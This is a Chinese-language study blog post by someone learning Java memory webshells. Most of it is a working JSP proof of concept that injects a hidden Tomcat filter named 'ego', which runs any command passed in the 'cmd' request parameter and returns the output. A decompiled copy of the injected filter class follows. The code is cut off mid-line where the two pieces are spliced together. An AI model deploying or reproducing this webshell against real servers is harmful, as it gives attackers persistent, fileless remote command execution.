之前学了flask的内存马,一直都想学学Java的内存马,所以就学了Tomcat Filter内存马,感觉还是太菜了呜呜呜好难看不太懂。最近学Java写下的文章都不太想发出来了,因为自己本身就没搞懂,都是迷迷糊糊的,看着各种文章上面说是怎么怎么样,然后分析了一波,给出了POC和结论,我是除了会用POC其他一点都没看太懂,只能说自己还是太菜了呜呜呜。
主要跟着天下大木头师傅的文章进行学习。
POC注意命令执行那里放的是windows的,linux用注释里面的。
<%@ page import="java.lang.reflect.Field" %> <%@ page import="org.apache.catalina.Context" %> <%@ page import="org.apache.tomcat.util.descriptor.web.FilterMap" %> <%@ page import="java.lang.reflect.Constructor" %> <%@ page import="org.apache.catalina.core.ApplicationFilterConfig" %> <%@ page import="org.apache.tomcat.util.descriptor.web.FilterDef" %> <%@ page import="org.apache.catalina.core.ApplicationContextFacade" %> <%@ page import="org.apache.catalina.core.ApplicationContext" %> <%@ page import="org.apache.catalina.core.StandardContext" %> <%@ page import="java.util.HashMap" %> <%@ page import="java.io.IOException" %> <%@ page import="java.io.InputStream" %> <%@ page import="java.io.ByteArrayOutputStream" %> <% ServletContext servletContext = request.getServletContext(); ApplicationContextFacade applicationContextFacade = (ApplicationContextFacade) servletContext; Field applicationContextFacadeContext = applicationContextFacade.getClass().getDeclaredField("context"); applicationContextFacadeContext.setAccessible(true); ApplicationContext applicationContext = (ApplicationContext) applicationContextFacadeContext.get(applicationContextFacade); Field applicationContextContext = applicationContext.getClass().getDeclaredField("context"); applicationContextContext.setAccessible(true); StandardContext standardContext = (StandardContext) applicationContextContext.get(applicationContext); Field filterConfigs = standardContext.getClass().getDeclaredField("filterConfigs"); filterConfigs.setAccessible(true); HashMap hashMap = (HashMap) filterConfigs.get(standardContext); String filterName = "ego"; if (hashMap.get(filterName)==null){ Filter filter = new Filter() { @Override public void init(FilterConfig filterConfig) throws ServletException { //Filter.super.init(filterConfig); //System.out.println("内存马init"); } @Override public void doFilter(ServletRequest request, ServletResponse response, FilterChain chain) throws IOException, ServletException { if (request.getParameter("cmd")!=null){ //String[] cmds = {"/bin/sh","-c",request.getParameter("cmd")} String[] cmds = {"cmd","/c",request.getParameter("cmd")}; InputStream in = Runtime.getRuntime().exec(cmds).getInputStream(); byte[] bcache = new byte[1024]; int readSize = 0; try(ByteArrayOutputStream outputStream = new ByteArrayOutputStream()){ while ((readSize =in.read(bcache))!=-1){ outputStream.write(bcache,0,readSize); } response.getWriter().println(outputStream.toString()); } } } @Override public void destroy() { Filter.super.destroy(); } }; FilterDef filterDef = new FilterDef(); filterDef.setFilter(filter); filterDef.setFilterName(filterName); filterDef.setFilterClass(filter.getClass().getName()); standardContext.addFilterDef(filterDef); FilterMap filterMap = new FilterMap(); filterMap.addURLPattern(" package org.apache.jsp; import java.io.ByteArrayOutputStream; import java.io.IOException; import java.io.InputStream; import javax.servlet.Filter; import javax.servlet.FilterChain; import javax.servlet.FilterConfig; import javax.servlet.ServletException; import javax.servlet.ServletRequest; import javax.servlet.ServletResponse; class shell_jsp.1 implements Filter { shell_jsp.1() { } public void init(FilterConfig filterConfig) throws ServletException { } public void destroy() { super.destroy(); } public void doFilter(ServletRequest request, ServletResponse response, FilterChain chain) throws IOException, ServletException { if (request.getParameter("cmd") != null) { String[] cmds = new String[]{"cmd", "/c", request.getParameter("cmd")}; InputStream in = Runtime.getRuntime().exec(cmds).getInputStream(); byte[] bcache = new byte[1024]; int readSize = 0; Throwable throwable = null; Object var9_10 = null; try (ByteArrayOutputStream outputStream = new ByteArrayOutputStream();){ while ((readSize = in.read(bcache)) != -1) { outputStream.write(bcache, 0, readSize); } response.getWriter().println(outputStream.toString()); } catch (Throwable throwable2) { if (throwable == null) { throwable = throwable2; } else if (throwable != throwable2) { throwable.addSuppressed(throwable2); } throw throwable; } } } } [arthas@14788]$总结
太难咧,好久没碰Java,Servlet和tomcat也没了解,看这玩意就跟看天书一样,爬了爬了,接下来Java先从简单学起了。
参考链接https://www.yuque.com/tianxiadamutou/zcfd4v/kd35na#de7894b8
https://mp.weixin.qq.com/s/YhiOHWnqXVqvLNH7XSxC9w
https://www.cnblogs.com/whgk/p/6399262.html
https://xz.aliyun.com/t/10196#toc-3
https://github.com/Firebasky/Java/blob/main/java%E5%86%85%E5%AD%98%E9%A9%AC/Tomcat%20Filter/Tomcat%20Filter.rar
https://mp.weixin.qq.com/s?__biz=MzAwMjA5OTY5Ng==&mid=2247497074&idx=1&sn=70af33768141a7f47ba897d0088c1d6f&chksm=9acd25edadbaacfb66508a9c7d3a4fc4c8ab3e4b10750649ca660918c9fb6a6c38bb82234c0d&mpshare=1&scene=23&srcid=07115avttH7no39MEFCHDTYD&sharer_sharetime=1625974302865&sharer_shareid=33a823b10ae99f33a60db621d83241cb#rd
欢迎分享,转载请注明来源:内存溢出
评论列表(0条)